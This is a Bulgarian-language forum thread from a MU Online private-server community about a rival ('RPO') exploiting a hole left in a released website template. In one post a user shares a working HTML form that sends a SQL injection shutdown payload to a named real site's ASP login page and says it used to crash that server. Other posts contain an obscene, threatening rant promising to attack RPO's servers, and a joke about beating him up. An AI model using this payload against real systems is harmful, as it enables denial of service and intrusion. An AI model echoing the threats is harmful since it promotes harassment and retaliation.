RPO за Battle Zone Style

Status
Not open for further replies.

Protect

Active Member
Joined
May 30, 2008
Messages
989
Reaction score
150
Ам да ви кажа rpo е разбрал каде е дупката която е оставил дамян в уеба които е релииснал и в момента rpo хаква сървъри а като го питах защо ме хакваш кои каза мразя да ме копират.
Чесно да ви кажа това хич не ме накефи да оставите дупка и да ви я открият.Сега хората които са с него ще ядат пишкира...
 

ReaL

New Member
Joined
Apr 13, 2008
Messages
1,244
Reaction score
656
1st: Бачкаме по въпроса, за сега оправям тези дупки, които аз знам (remotely, което означава, че няма да разберете кога съм ги оправил)! Надявам се да бъда бърз... Моля hustlermu и др потърпевши да ми драскат PM или по Skype!
2nd: Има др дупка, която Damian е оставил... за нея нищо незнам :(
3rd: Открихме дупчица в уебс-ите на RPO (XSS)...
 

Bupyc™

New Member
Joined
Jul 10, 2008
Messages
504
Reaction score
327
Моля всеки с BZ style да драсне тук 1 ред да го оправим !
да няма този проблем
 

DoKToPa

Active Member
Joined
Aug 21, 2008
Messages
368
Reaction score
46
Battle Zone Style

Ам да ви кажа rpo е разбрал каде е дупката която е оставил дамян в уеба които е релииснал и в момента rpo хаква сървъри а като го питах защо ме хакваш кои каза мразя да ме копират.
Чесно да ви кажа това хич не ме накефи да оставите дупка и да ви я открият.Сега хората които са с него ще ядат пишкира...

Kак може...?!?...да ти каже че е мразел да го копират като самия сайт е копнат от MuAliensClub....просто това немога да го проумея....то бива бива ама неговото ептен не се търпи.
 
Last edited:

--BoMBa--

New Member
Joined
Sep 22, 2008
Messages
327
Reaction score
52
след колко време горе долу ще е готово?
 

RhysFox

New Member
Joined
Jun 30, 2008
Messages
918
Reaction score
299
kак може...?!?...да ти каже че е мразел да го копират като самия сайт е копнат от mualiensclub....и долу горе от rozabg..... просто това немога да го проумея....то бива бива ама неговото ептен не се търпи.


РозаБГ не бяха с същия сайт. Тяхния беше малко по-старичка версия. Лично съм говорил с един от админите да го питам ;)
 

plamka

New Member
Joined
Jun 27, 2008
Messages
30
Reaction score
0
емии ... преди да пуснете нещо официално, го тествайте ... максимално
 

RhysFox

New Member
Joined
Jun 30, 2008
Messages
918
Reaction score
299
Пламка винаги когато нещо се прави след време ще се намери някой проблем. Винаги ще има нужда от поправка и подобрения ;)
 

plamka

New Member
Joined
Jun 27, 2008
Messages
30
Reaction score
0
а не, аз не се занимавам с Му. Имам някакви познания за играта но ... не се занимавам с сървъри .. с сайт по-става.

Е да не е лесна работа ... знам че е трудно и работата е доста ... но преди да пуснете нещо официално бъдете поне 99%, че работи без бъгове и дупки ;) Нека бъде качествено ;)
 

RhysFox

New Member
Joined
Jun 30, 2008
Messages
918
Reaction score
299
Ми гледай как седят нещата. Незнам защо, но от тука аз съм теглил всичко и съм се оплаквал само от 1 нещо. И то е в едни Season 3 Episode 1 файлове, като естествено на края се оказа, че грешката не е била в файловете или в човека който ги е пуснал, а в мене ;) Мога да те оверя, че членовете от екипа като се заемат с нещо не го оставят на половина свършено. Може да се забяваме, но това е защото сигурно в момента имаме нещо по-важно да правим. Поне аз съм така, нищо че не разбирам колкото другите пак, не оставям нещата незавършени ;) Щов РеаЛ е казал, че ще го оправи значи ще го, 100% :)
 
Last edited:

plamka

New Member
Joined
Jun 27, 2008
Messages
30
Reaction score
0
Е аз не ви казвам, че не правите качествени продукти ;) Няма таова нещо ... просто говоря конкретно за този уеб сайт с дупката ;)
 

RhysFox

New Member
Joined
Jun 30, 2008
Messages
918
Reaction score
299
Разбери, че дори и да го оправи след време пак ще се намери някой да го хакне и след т'ва пак ще трябва да се фикс и след 'тва пак хак и пак фикс и така. Кръговрата на файловете ;)
 

FreestyleR

New Member
Joined
May 14, 2008
Messages
129
Reaction score
19
На RozaBG сайта им е в *.asp каквото и да правиш по него не можеш да го дропнеш, асп форматите се правеха от сял сървъра, ако прецакаш сял сървъра им и сайта отива, само че ако са блокнали с Firewall сял сървъра не знам вече ко трябва да се прави за да го хакнат :(speechless):
 

RhysFox

New Member
Joined
Jun 30, 2008
Messages
918
Reaction score
299
На rozabg сайта им е в *.asp каквото и да правиш по него не можеш да го дропнеш, асп форматите се правеха от сял сървъра, ако прецакаш сял сървъра им и сайта отива, само че ако са блокнали с firewall сял сървъра не знам вече ко трябва да се прави за да го хакнат :(speechless):

Аз знам какво... Седиш две години на компютъра докато намериш начин да го направиш ;)
 

ReaL

New Member
Joined
Apr 13, 2008
Messages
1,244
Reaction score
656
На RozaBG сайта им е в *.asp каквото и да правиш по него не можеш да го дропнеш, асп форматите се правеха от сял сървъра, ако прецакаш сял сървъра им и сайта отива, само че ако са блокнали с Firewall сял сървъра не знам вече ко трябва да се прави за да го хакнат :(speechless):

Code:
<html>
<form action="http://mu.igri.net/pkok.asp" method="post">
<input type="hidden" name="username" value="notimportant">
<input type="hidden" name="userchr" value="letzinject">
<input name="pass" type="text" value="notimportant';[shutdown;--]">
<input type="submit" name="submit" value="Do IT!">
</form>
</html>

Преди постоянно падаше от това ;]
Сега има др дупки, които разбира се, няма да листвам тук...
 

Mephisto

New Member
Joined
Apr 10, 2008
Messages
451
Reaction score
240
питах защо ме хакваш кои каза мразя да ме копират.

С извинение аз майка му гърбава проста мога ли да еба,шибания педерас копира като насран после мразя да ме копират ,аз ще го науча някои ден ако още се дърви така ще му го набабаня на всичките сървъра че се моли после най-мразя пишлемета кадето знаят 2 неща да ми се дарвят.Аз да му кажа на тоя гомню.От каде е тръгнал едно време с насраните гащи ся ми се прави на баровец я да си трае там че до ся никои не си патил от мен колкото и да ме е ядосвал ама тоя май ще е първия ама аз захапя ли не пускам.Ще го изчакам още 1 месец да го видим ако още се прави на оборотен ще го пресечем
 
  • Like
Reactions: Hogu

FeliXcat

Active Member
Joined
Aug 18, 2008
Messages
947
Reaction score
218
WoWz тва беше яко изказване 10/10 :D
 

NeoGame

New Member
Joined
Aug 15, 2008
Messages
655
Reaction score
58
Незнам но според мене някой ден rpo сте си изпроси яката и тогава става лошо
Че защо да сме копирали сайтовете му кат този сайт беше първи на АлиенМу до колкото знам
 

RhysFox

New Member
Joined
Jun 30, 2008
Messages
918
Reaction score
299
Тоя rpo не можем ли да го набием малко ;)?
 
Status
Not open for further replies.